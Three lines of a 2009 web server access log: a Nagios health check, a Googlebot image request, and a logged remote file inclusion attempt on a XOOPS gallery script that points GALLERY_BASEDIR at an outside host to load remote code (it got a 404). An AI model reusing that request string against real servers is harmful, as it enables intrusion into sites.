84.22.133.229 - - [26/Nov/2009:03:25:25 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:03:25:34 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.65.67 - - [26/Nov/2009:03:25:49 -0500] "GET /images/items/index19_opthalmo.jpg HTTP/1.1" 200 2702 "-" "Googlebot-Image/1.0"
